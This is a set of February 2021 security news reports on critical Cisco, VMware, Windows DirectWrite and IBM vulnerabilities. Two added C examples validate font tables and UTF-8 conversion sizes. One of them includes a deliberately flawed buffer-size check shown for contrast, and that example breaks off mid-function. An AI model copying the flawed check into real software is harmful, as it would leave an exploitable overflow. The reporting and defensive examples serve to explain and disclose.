“A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices,” said Cisco on Wednesday.

Cisco’s Critical Cybersecurity Flaw: Easily Exploitable
The vulnerability (CVE-2021-1388) ranks 10 (out of 10) on the CVSS vulnerability-rating scale. The glitch is considered critical because an attacker – without any authentication – could remotely exploit it, merely by sending a crafted request to the affected API.

Affected versions. Image credit: Cisco

Cisco said that ACI MSO versions running a 3.0 release of software are affected. However, they would have to be deployed on a Cisco Application Services Engine, which is the company’s unified application hosting platform for deploying data-center applications. ACI MSO can either be deployed as a cluster in Cisco Application Services Engine, or deployed in nodes as virtual machines on a hypervisor.

Cisco said it’s not aware of any public exploits or “malicious use” of the vulnerability thus far. Users can learn about update options by visiting Cisco’s security advisory page.

Cisco Vulnerability Grants Root Privileges on Nexus Switches
Cisco also stoppered a hole stemming from NX-OS, Cisco’s network operating system for its Nexus-series Ethernet switches.

The flaw, which has a CVSS score of 9.8 out of 10, could allow an unauthenticated, remote attacker to create, delete or overwrite arbitrary files with root privileges on affected devices. Those affected devices are the Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches (in standalone NX-OS mode).

The vulnerability (CVE-2021-1361) stems from an error in the implementation of an internal file management service. It exists because TCP port 9075 is incorrectly configured to listen and respond to external connection requests.

“An attacker could exploit this vulnerability by sending crafted TCP packets to an IP address that is configured on a local interface on TCP port 9075,” said Cisco. “A successful exploit could allow the attacker to create, delete, or overwrite arbitrary files, including sensitive files that are related to the device configuration.”

In an example scenario, after exploiting the flaw, an attacker could add a user account without the device administrator knowing.

The Nexus 3000 series switches and Nexus 9000 series switches “are vulnerable by default.” Thus, it’s critical for users of these devices to update as soon as possible (for more information on doing so, or to see how they can check if their device is vulnerable, users can check out Cisco’s security advisory).

Cisco Application Services Engine: Unauthorized Access Flaw
Another critical flaw for Cisco exists in the Application Services Engine. This glitch could allow unauthenticated, remote attackers to gain privileged access to host-level operations. From there, they would be able to glean device-specific information, create diagnostic files and make limited configuration changes.

The flaw (CVE-2021-1393) affects Cisco Application Services Engine Software releases 1.1(3d) and earlier. It ranks 9.8 out of 10 on the CVSS scale.

“The vulnerability is due to insufficient access controls for a service running in the data network,” said Cisco. “An attacker could exploit this vulnerability by sending crafted TCP requests to a specific service. A successful exploit could allow the attacker to have privileged access to run containers or invoke host-level operations.”

More Critical Cisco Fixes
The Cisco flaws are the latest vulnerabilities for the networking giant to stomp out.

In the beginning of this month, Cisco rolled out fixes for critical holes in its lineup of small-business VPN routers. The flaws could be exploited by unauthenticated, remote attackers to view or tamper with data, and perform other unauthorized actions on the routers.

And in January, Cisco warned of a high-severity flaw in its smart Wi-Fi solution for retailers, which could allow a remote attacker to alter the password of any account user on affected systems. The flaw was part of a number of patches issued by Cisco addressing 67 high-severity CVEs.


Cisco fixes three critical bugs in ACI Multi-Site Orchestrator, Application Services Engine, and NX-OS
26.2.2021
Vulnerebility  Securityaffairs

Cisco addressed over a dozen vulnerabilities in its products, including three critical bugs in ACI Multi-Site Orchestrator, Application Services Engine, and NX-OS software.
Cisco released security updates to address over a dozen vulnerabilities affecting multiple products, including three critical flaws impacting its ACI Multi-Site Orchestrator, Application Services Engine, and NX-OS software.

The most severe vulnerability addressed by the IT giant, tracked as CVE-2021-1388, is a remote authentication bypass issue that affects an API endpoint of the ACI Multi-Site Orchestrator (MSO). The vulnerability received a CVSS score of 10.
“A vulnerability in an API endpoint of Cisco ACI Multi-Site Orchestrator (MSO) installed on the Application Services Engine could allow an unauthenticated, remote attacker to bypass authentication on an affected device.” reads the advisory published by Cisco.

“The vulnerability is due to improper token validation on a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted request to the affected API. A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices.”

The flaw is caused by the improper validation of tokens. An attacker could trigger the issue by sending crafted requests to receive a token with administrator-level privileges that could then be used to authenticate to the API on affected MSO devices.

This flaw affects Cisco ACI Multi-Site Orchestrator (MSO) running software version 3.0 only when deployed on a Cisco Application Services Engine.

Cisco also addressed two unauthorized access vulnerabilities, tracked as CVE-2021-1393 and CVE-2021-1396, that affect the Application Services Engine. The most severe is the CVE-2021-1393, which received a CVSS score of 9.8.

“Multiple vulnerabilities in Cisco Application Services Engine could allow an unauthenticated, remote attacker to gain privileged access to host-level operations or to learn device-specific information, create diagnostic files, and make limited configuration changes.” reads the advisory.

The issues affect only Application Services Engine release 1.1.

Another critical flaw fixed by Cisco is CVE-2021-1361, which affects NX-OS running on Nexus 3000 and Nexus 9000 series switches. The flaw received a CVSS score of 9.8; it could be exploited remotely, without authentication, to manipulate arbitrary files with root privileges.

“A vulnerability in the implementation of an internal file management service for Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode that are running Cisco NX-OS Software could allow an unauthenticated, remote attacker to create, delete, or overwrite arbitrary files with root privileges on the device.” reads the advisory.
“A successful exploit could allow the attacker to create, delete, or overwrite arbitrary files, including sensitive files that are related to the device configuration. For example, the attacker could add a user account without the device administrator knowing.”

The flaw affects Nexus 3000 series switches and Nexus 9000 series switches, in standalone NX-OS mode, running NX-OS software release 9.3(5) or release 9.3(6).

The good news is that Cisco is not aware of attacks in the wild exploiting these vulnerabilities.

The full list of flaws addressed by the tech company is available on Cisco’s security portal.


Google discloses technical details of Windows CVE-2021-24093 RCE flaw
26.2.2021
Vulnerebility  Securityaffairs

Google Project Zero team disclosed the details of a recently patched remote code execution vulnerability (CVE-2021-24093) in the Windows operating system.
White hat hackers at Google Project Zero disclosed the details of a recently patched Windows vulnerability, tracked as CVE-2021-24093, that can be exploited for remote code execution in the context of the DirectWrite client.

DirectWrite is a Windows API designed to support measuring, drawing, and hit-testing of multi-format text.

The vulnerability was discovered by Dominik Röttsches of Google and Mateusz Jurczyk of Google Project Zero. Google reported the issue to Microsoft in November and disclosed the details this week.

The flaw was addressed with the release of February 2021 Patch Tuesday updates.

The issue affects the Windows graphics component in all operating systems and received a CVSS score of 8.8.

An attacker could exploit the flaw by tricking the victims into visiting a specially crafted site hosting a file set up to trigger the issue.

The CVE-2021-24093 vulnerability is a DirectWrite heap-based buffer overflow that resides in the processing of a specially crafted TrueType font.

“We have discovered a crash in the DWrite!fsg_ExecuteGlyph function when loading and rasterizing a malformed TrueType font with a corrupted “maxp” table. Specifically, it was triggered after changing the value of the maxPoints field from 168 to 0, and the maxCompositePoints value from 2352 to 3 in our test font. We believe that this causes an inadequately small buffer to be allocated from the heap.” reads the report published by Google.
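As an added example (not DirectWrite or Google code, and not the fix Microsoft shipped), the block below parses a version 1.0 maxp table, sizes a glyph point buffer from its maxPoints field the way a rasterizer would, and rejects any simple glyph whose header claims more points than that capacity. The maxp and glyph bytes are constructed inline; composite glyphs (maxCompositePoints) are left out.

```c
/* Added example, not DirectWrite or Google code: sizing a glyph point buffer
 * from the TrueType 'maxp' table and validating each glyph against it before
 * any point is stored. Table layouts follow the OpenType specification; the
 * sample bytes are constructed for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static uint16_t be16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

typedef struct {
    uint16_t numGlyphs, maxPoints, maxContours, maxCompositePoints, maxCompositeContours;
} maxp_limits;

/* Parse a version 1.0 'maxp' table (32 bytes).
 * Returns 0 on success, -1 if the table is truncated or not version 1.0. */
int parse_maxp(const unsigned char *t, size_t len, maxp_limits *out)
{
    if (len < 32 || be32(t) != 0x00010000u) return -1;
    out->numGlyphs            = be16(t + 4);
    out->maxPoints            = be16(t + 6);
    out->maxContours          = be16(t + 8);
    out->maxCompositePoints   = be16(t + 10);
    out->maxCompositeContours = be16(t + 12);
    return 0;
}

/* Points declared by a simple glyph: endPtsOfContours[last] + 1.
 * Returns -1 for a truncated header or a composite glyph (numberOfContours < 0). */
long simple_glyph_point_count(const unsigned char *g, size_t len)
{
    if (len < 10) return -1;
    int16_t contours = (int16_t)be16(g);
    if (contours < 0) return -1;
    if (contours == 0) return 0;
    if (len < 10 + (size_t)contours * 2) return -1;
    return (long)be16(g + 10 + ((size_t)contours - 1) * 2) + 1;
}

typedef struct { int16_t *x, *y; size_t capacity; } point_buffer;

/* A rasterizer allocates its scratch space once, sized by maxp.maxPoints. With a
 * corrupted maxp (maxPoints = 0) this buffer is far too small, so the per-glyph
 * check in glyph_points_checked() is what prevents an out-of-bounds write. */
int point_buffer_alloc(const maxp_limits *m, point_buffer *pb)
{
    pb->capacity = m->maxPoints;
    pb->x = calloc(pb->capacity ? pb->capacity : 1, sizeof *pb->x);
    pb->y = calloc(pb->capacity ? pb->capacity : 1, sizeof *pb->y);
    return (pb->x && pb->y) ? 0 : -1;
}

void point_buffer_free(point_buffer *pb) { free(pb->x); free(pb->y); pb->x = pb->y = NULL; }

/* Validate a glyph against the buffer before filling it. Returns the number of
 * points the glyph may store, or -1 when it is malformed or exceeds capacity. */
long glyph_points_checked(const point_buffer *pb, const unsigned char *g, size_t len)
{
    long n = simple_glyph_point_count(g, len);
    if (n < 0 || (size_t)n > pb->capacity) return -1;
    return n;
}

/* Constructed 'maxp' v1.0 table: numGlyphs 1, maxPoints 168, maxContours 4,
 * maxCompositePoints 2352, maxCompositeContours 8; remaining fields zero. */
static const unsigned char MAXP_OK[32] = {
    0x00,0x01,0x00,0x00, 0x00,0x01, 0x00,0xA8, 0x00,0x04, 0x09,0x30, 0x00,0x08 };
/* Constructed one-contour simple glyph header: bbox 0,0..100,100,
 * endPtsOfContours[0] = 3, i.e. four points. */
static const unsigned char GLYPH_4PTS[12] = {
    0x00,0x01, 0x00,0x00, 0x00,0x00, 0x00,0x64, 0x00,0x64, 0x00,0x03 };

int main(void)
{
    unsigned char maxp_bad[32];
    memcpy(maxp_bad, MAXP_OK, sizeof maxp_bad);
    maxp_bad[6] = 0x00; maxp_bad[7] = 0x00;      /* maxPoints 168 -> 0, as in the report */

    maxp_limits ok, bad;
    point_buffer pb;
    parse_maxp(MAXP_OK, sizeof MAXP_OK, &ok);
    parse_maxp(maxp_bad, sizeof maxp_bad, &bad);

    point_buffer_alloc(&ok, &pb);
    printf("sane maxp: glyph accepted with %ld points\n",
           glyph_points_checked(&pb, GLYPH_4PTS, sizeof GLYPH_4PTS));
    point_buffer_free(&pb);

    point_buffer_alloc(&bad, &pb);
    printf("maxPoints=0: glyph check returns %ld (rejected)\n",
           glyph_points_checked(&pb, GLYPH_4PTS, sizeof GLYPH_4PTS));
    point_buffer_free(&pb);
    return 0;
}
```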

The researchers also released a proof-of-concept (PoC) exploit (poc.ttf poc.html).


Thousands of VMware vCenter servers exposed online and potentially vulnerable to CVE-2021-21972 flaw
26.2.2021
Vulnerebility  Securityaffairs

A Chinese security researcher published PoC code for the CVE-2021-21972 vulnerability in VMware vCenter; thousands of vulnerable servers are exposed online.
A Chinese security researcher published proof-of-concept exploit code for the CVE-2021-21972 RCE vulnerability affecting VMware vCenter servers.

vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.

The flaw could be exploited by remote, unauthenticated attackers without user interaction.

“The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published. “A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.”

The issue affects the vCenter Server plugin for vROPs, which is available in all default installations. vROPs does not need to be present for this endpoint to be available. The virtualization giant has provided workarounds to disable it.

Shortly after the publication of the flaw, experts from security firm Bad Packets started observing online scanning for vulnerable servers.

At the time of this writing, a query of the Shodan search engine turns up more than 6,700 potentially vulnerable VMware vCenter servers exposed online.
The CVE-2021-21972 flaw was reported by Mikhail Klyuchnikov from Positive Technologies; it has received a CVSSv3 base score of 9.8/10 according to VMware’s security advisory.

Positive Technologies published a detailed analysis for this vulnerability to share knowledge about potential compromises resulting from the exploitation of this issue.

Experts from Positive Technologies decided to avoid publishing the PoC code for this issue because of the large number of installs exposed online that have yet to be patched.

Unfortunately, ZDNet reported the availability of other easy-to-use proof-of-concept code, exposing organizations to the risk of compromise.

Experts warn that cybercrime organizations could hit vulnerable installs to compromise networks and conduct several malicious activities, including the deployment of ransomware.

Darkside and RansomExx ransomware operators were observed targeting VMware infrastructure in recent months.


Cisco Patches Severe Flaws in Network Management Products, Switches
26.2.2021
Vulnerebility  Securityweek

Cisco this week released patches for over a dozen vulnerabilities affecting multiple products, including three critical bugs impacting its ACI Multi-Site Orchestrator, Application Services Engine, and NX-OS software.

The most severe of these issues is a flaw in an API endpoint of ACI Multi-Site Orchestrator (MSO), which could allow a remote attacker to bypass authentication. The vulnerability is tracked as CVE-2021-1388 and features a CVSS score of 10.

Due to the improper validation of tokens, an attacker could send crafted requests to receive a token with administrator-level privileges that they could then use to authenticate to the API on affected MSO devices.

According to Cisco, ACI MSO running software version 3.0 is vulnerable, but only if deployed on an Application Services Engine (it can also be deployed as VMs on a hypervisor).

Cisco also addressed two unauthorized access bugs in Application Services Engine, namely CVE-2021-1393 and CVE-2021-1396, but only the former has a severity rating of critical (CVSS score 9.8). An attacker could exploit these bugs to gain privileged access to host-level operations, access device information, modify configurations, or create diagnostic files.

Due to insufficient access controls in the Data Network, an attacker could access a privileged service by exploiting CVE-2021-1393, or could access a specific API when exploiting CVE-2021-1396. Only Application Services Engine release 1.1 is vulnerable and no workarounds exist for these bugs.

Also featuring a CVSS score of 9.8, the third critical flaw that Cisco patched this week (CVE-2021-1361) affects Nexus 3000 and Nexus 9000 series switches. Affecting the NX-OS software, the issue could be exploited remotely to manipulate arbitrary files with root privileges, without authentication.

“A successful exploit could allow the attacker to create, delete, or overwrite arbitrary files, including sensitive files that are related to the device configuration. For example, the attacker could add a user account without the device administrator knowing,” Cisco explains.

Nexus 3000 series switches and Nexus 9000 series switches in standalone NX-OS mode are affected, if they are running NX-OS software release 9.3(5) or release 9.3(6).

Cisco says it is not aware of these vulnerabilities being exploited in the wild and advises customers to install the released patches as soon as possible.

Two high-severity issues that Cisco patched in NX-OS software this week could lead to cross-site request forgery (CSRF) and denial-of-service (DoS), while two others patched in Nexus 9000 series fabric switches could lead to unauthorized access to the infrastructure VLAN, or to DoS, respectively.

Cisco also addressed several medium-severity flaws in the FXOS and NX-OS software, Nexus 9000 series fabric switches, and AnyConnect Secure Mobility Client. A DoS issue in AnyConnect Secure Mobility Client remains under investigation with no workarounds available, Cisco says.

Details on all of these security bugs can be found on Cisco’s security portal.


Hackers Scanning for VMware vCenter Servers Affected by Critical Vulnerability
26.2.2021
Vulnerebility  Securityweek

Just one day after VMware announced the availability of patches for a critical vulnerability affecting vCenter Server, hackers have started scanning the internet for vulnerable servers.

The flaw, tracked as CVE-2021-21972, affects the vSphere Client component of vCenter Server and it can be exploited by a remote, unauthenticated attacker to execute arbitrary commands with elevated privileges on the operating system that hosts vCenter Server.

While in most cases an attacker would need to have access to the targeted organization’s network in order to exploit the vulnerability, there are over 6,000 potentially vulnerable systems that are accessible directly from the internet.

Many of these servers are located in the United States, Germany, China, France and the United Kingdom.

Cybersecurity firm Positive Technologies, whose researchers discovered the flaw and reported it to VMware, has released technical details for the vulnerability after seeing that several individuals had released proof-of-concept (PoC) exploit code shortly after the virtualization giant announced the availability of patches.

VMware published its advisory on February 23, and threat intelligence company Bad Packets reported on February 24 that it had already detected “mass scanning activity” targeting vCenter servers affected by CVE-2021-21972.

Mikhail Klyuchnikov, the Positive Technologies researcher credited for finding the vulnerability, said this flaw is just as dangerous as a widely exploited Citrix vulnerability tracked as CVE-2019-19781.

“If the vulnerable software can be accessed from the Internet, this will allow an external attacker to penetrate the company's external perimeter and also gain access to sensitive data,” he explained.


VMWare Patches Critical RCE Flaw in vCenter Server

25.2.2021 Vulnerebility  Threatpost
The vulnerability, one of three patched by the company this week, could allow threat actors to breach the external perimeter of a data center or leverage backdoors already installed to take over a system.


VMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.

Positive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware’s vSphere virtualization platform, which—given VMware’s dominant position in the market—is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.

Where the VMware Flaws Were Found, What’s Affected?
The researcher found the most critical of the flaws, which is being tracked as CVE-2021-21972 and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to an advisory posted online Tuesday by VMware.

“A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,” the company said.

The plugin is available in all default installations—potentially giving attackers a wide attack surface–and vROPs need not be present to have this endpoint available, according to VMware.

The main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods–such as social engineering or web vulnerabilities–or have access to the internal network using previously installed backdoors, according to Positive Technologies.

Klyuchnikov said the VMware flaw poses “no less threat” than a notoriously easy-to-exploit Citrix RCE vulnerability, CVE-2019-19781, which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because “it can be used by any unauthorized user,” he said.

“The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,” Klyuchnikov explained. “After receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.”

How is CVE-2021-21972 Exploited?
In the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company’s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.

Another flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor VMware ESXi, the company said. CVE-2021-21974, with a CVSSv3 base score of 8.9, is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.

A threat actor who’s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.

The other flaw Klyuchnikov discovered—tracked as CVE-2021-21973 and the least serious of the three–is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin, with a CVSS score of 5.3, according to VMWare. “A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,” the company said.

Unauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company’s internal network and obtain information about the open ports of various services, Klyuchnikov said.

What Is VMware Recommending to Fix the Data Center Bugs?
VMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can’t immediately update their systems.

Positive Technologies also recommended that affected companies remove any vCenter Server interfaces from the perimeter of their organizations and allocate those interfaces to a separate VLAN with a limited access list on the internal network.


Google Discloses Details of Remote Code Execution Vulnerability in Windows
25.2.2021
Vulnerebility  Securityweek

Google’s cybersecurity research unit Project Zero on Wednesday disclosed the details of a recently patched Windows vulnerability that can be exploited for remote code execution.

The flaw, tracked as CVE-2021-24093, was patched by Microsoft on February 9 with its Patch Tuesday updates. Dominik Röttsches of Google and Mateusz Jurczyk of Google Project Zero have been credited for reporting the issue to Microsoft.

A CVSS score of 8.8 has been assigned to the vulnerability, but Microsoft has rated it critical for all affected operating systems. The list includes Windows 10, Windows Server 2016 and 2019, and Windows Server.

According to Microsoft, the security hole impacts a Windows graphics component and it can be exploited by luring the targeted user to a website hosting a specially crafted file set up to exploit the flaw.

The Google researchers reported the vulnerability to Microsoft in late November and the bug report was made public on Wednesday, roughly two weeks after Microsoft released a patch.

Jurczyk and Röttsches described CVE-2021-24093 as a DirectWrite heap-based buffer overflow related to the processing of a specially crafted TrueType font. They explained that an attacker can trigger a memory corruption condition that can be leveraged to execute arbitrary code in the context of the DirectWrite client. DirectWrite is a Windows API designed for high-quality text rendering.

The researchers tested their exploit on a fully patched Windows 10 in all major browsers. In addition to technical details, they released a proof-of-concept (PoC) exploit.

However, based on its exploitability assessment, Microsoft does not believe the vulnerability will be exploited in the wild.


Critical VMware vCenter Server Flaw Can Expose Organizations to Remote Attacks
25.2.2021
Vulnerebility  Securityweek

VMware on Tuesday informed customers that its vCenter Server product is affected by a critical vulnerability that can be exploited by an attacker to execute commands with elevated privileges.

vCenter Server is management software designed to provide a centralized platform for controlling VMware vSphere environments. The critical vulnerability, discovered by Positive Technologies researcher Mikhail Klyuchnikov, impacts a vCenter Server plugin used by the vSphere Client.

The flaw, tracked as CVE-2021-21972 with a CVSS score of 9.8, can be exploited by an attacker with network access to port 443 to “to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,” VMware said in its advisory.

According to Positive Technologies, while 90 percent of vCenter devices are only accessible from within an organization’s perimeter — exploitation of the vulnerability in this case requires access to the target’s internal network — there are more than 6,000 systems that are accessible directly from the internet.

The cybersecurity firm said more than a quarter of these devices are located in the United States, followed by Germany (7%), France (6%), China (6%), the UK (4%), Canada (4%), Russia (3%), Taiwan (3%), Iran (3%), and Italy (3%).

“In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),” Positive Technologies’ Klyuchnikov explained. “The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.”

He added, “After receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system (such as information about virtual machines and system users). If the vulnerable software can be accessed from the Internet, this will allow an external attacker to penetrate the company's external perimeter and also gain access to sensitive data. Once again, I would like to note that this vulnerability is dangerous, as it can be used by any unauthorized user.”

Klyuchnikov has also been credited for a medium-severity server-side request forgery (SSRF) flaw in vCenter Server, specifically in a plugin used by the vSphere Client. An attacker with network access to port 443 could exploit this vulnerability to obtain information — including on open ports associated with various services — that could be useful for further attacks.

VMware has also informed users about CVE-2021-21974, a high-severity heap overflow in ESXi that can be exploited by an attacker with network access to port 427 to execute arbitrary code.

The issue was reported to VMware by Lucas Leong of Trend Micro's Zero Day Initiative (ZDI). ZDI has yet to make its own advisory for this vulnerability public.

VMware has released patches and workarounds for each of the affected products and versions.

It’s important that organizations using affected products apply the patches or workarounds since VMware product vulnerabilities being targeted by threat actors is not unheard of. The NSA warned recently that a state-sponsored threat actor linked to Russia had exploited a flaw in VMware Workspace ONE, likely even before a patch was released by the virtualization giant.


Critical RCE Flaws Affect VMware ESXi and vSphere Client — Patch Now
25.2.2021
Vulnerebility  Thehackernews
VMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.

"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server," the company said in its advisory.

The vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.

"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781)," said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.

"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server."

With this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, Klyuchnikov noted.

Separately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.

The information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.

VMware ESXi and vSphere Client
VMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found here.

It's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product (CVE-2021-21976, CVSS score 7.2) earlier this month that could allow a bad actor with administrative privileges to execute shell commands and achieve RCE.

Lastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.

OpenSLP provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.

The latest fix for ESXi OpenSLP comes on the heels of a similar patch (CVE-2020-3992) last November that could be leveraged to trigger a use-after-free in the OpenSLP service, leading to remote code execution.

Not long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs abusing the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.

It's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to "removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network."


IBM Squashes Critical Remote Code-Execution Flaw

24.2.2021 Vulnerebility  Threatpost

A critical-severity buffer-overflow flaw that affects IBM Integration Designer could allow remote attackers to execute code.

IBM has patched a critical buffer-overflow error that affects Big Blue’s Integration Designer toolset, which helps enterprises create business processes that integrate applications and data. If exploited, the flaw could enable remote code execution.

The flaw (CVE-2020-27221) has a CVSS base score of 9.8 out of 10, making it critical in severity. It stems from an issue in versions 7 and 8 of Java Runtime Environment (JRE), which is used by IBM Integration Designer toolset.

JRE is a software layer that runs on top of a computer’s operating system (OS), and enables Java to run seamlessly on any system regardless of its OS.

What is a Buffer-Overflow Flaw?
The flaw is a stack-based buffer-overflow error. This is a class of vulnerability where the region of a process’ memory that’s used to store dynamic variables (the heap) can be overwhelmed.

“By sending an overly long string, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash,” according to IBM’s Monday security advisory.

The error exists when the virtual machine (VM) or Java Native Interface converts characters from UTF-8 to platform encoding. Java Native Interface is a programming framework that enables Java code running in a Java VM to call native applications and libraries written in other languages.

IBM didn’t provide further information about what type of privileges an attacker would need, where they would need to send the string or the initial attack vector.
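As an added illustration of this bug class (this is not OpenJ9 or IBM code, and the real conversion routine is not reproduced here), the block below converts UTF-8 into a platform encoding that can be wider than its input, with UTF-16LE assumed as that encoding, and contrasts a capacity check based on the input byte count with one based on the computed output size.

```c
/* Added example, not OpenJ9 or IBM code: UTF-8 to UTF-16LE conversion with the
 * destination sized from the decoded output rather than from the input byte
 * count. UTF-16LE stands in for a "platform encoding" wider than UTF-8, which is
 * the expansion a fixed-size scratch buffer has to account for. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_BUF_BYTES 256   /* assumed size of a fixed on-stack scratch buffer */

/* Decode one UTF-8 sequence (1-4 bytes) into *cp.
 * Returns the number of bytes consumed, or 0 on a malformed sequence. */
static size_t utf8_decode(const unsigned char *s, size_t n, uint32_t *cp)
{
    if (n == 0) return 0;
    unsigned char c = s[0];
    size_t len;
    uint32_t v;
    if (c < 0x80) { *cp = c; return 1; }
    if ((c & 0xE0) == 0xC0)      { len = 2; v = c & 0x1F; }
    else if ((c & 0xF0) == 0xE0) { len = 3; v = c & 0x0F; }
    else if ((c & 0xF8) == 0xF0) { len = 4; v = c & 0x07; }
    else return 0;                                  /* stray continuation or 0xF8+ */
    if (n < len) return 0;                          /* truncated sequence */
    for (size_t i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        v = (v << 6) | (s[i] & 0x3F);
    }
    /* Reject overlong encodings, surrogates and values beyond U+10FFFF. */
    if ((len == 2 && v < 0x80) || (len == 3 && v < 0x800) || (len == 4 && v < 0x10000)) return 0;
    if (v > 0x10FFFF || (v >= 0xD800 && v <= 0xDFFF)) return 0;
    *cp = v;
    return len;
}

/* UTF-16 code units needed to hold the UTF-8 string; (size_t)-1 if malformed. */
size_t utf16_units_needed(const char *utf8, size_t n)
{
    const unsigned char *s = (const unsigned char *)utf8;
    size_t i = 0, units = 0;
    uint32_t cp = 0;
    while (i < n) {
        size_t k = utf8_decode(s + i, n - i, &cp);
        if (k == 0) return (size_t)-1;
        units += (cp >= 0x10000) ? 2 : 1;            /* supplementary plane: surrogate pair */
        i += k;
    }
    return units;
}

/* Flawed capacity check: decides from the input byte count, as if the output
 * could never be larger than the input. 200 ASCII bytes pass, but become 400. */
int flawed_fits_in_stack_buffer(const char *utf8, size_t n)
{
    (void)utf8;
    return n < STACK_BUF_BYTES;
}

/* Corrected check: decides from the size the converted output will actually have. */
int checked_fits_in_stack_buffer(const char *utf8, size_t n)
{
    size_t need = utf16_units_needed(utf8, n);
    return need != (size_t)-1 && need * 2 <= STACK_BUF_BYTES;
}

/* Convert into dst (capacity dst_cap bytes). Returns bytes written, or -1 when
 * the input is malformed or the result would not fit; nothing is written then. */
long utf8_to_utf16le(const char *utf8, size_t n, unsigned char *dst, size_t dst_cap)
{
    size_t need = utf16_units_needed(utf8, n);
    if (need == (size_t)-1 || need > dst_cap / 2) return -1;
    const unsigned char *s = (const unsigned char *)utf8;
    size_t i = 0, out = 0;
    uint32_t cp = 0;
    while (i < n) {
        size_t k = utf8_decode(s + i, n - i, &cp);   /* already validated above */
        if (cp >= 0x10000) {
            uint32_t v = cp - 0x10000;
            uint16_t hi = (uint16_t)(0xD800 | (v >> 10));
            uint16_t lo = (uint16_t)(0xDC00 | (v & 0x3FF));
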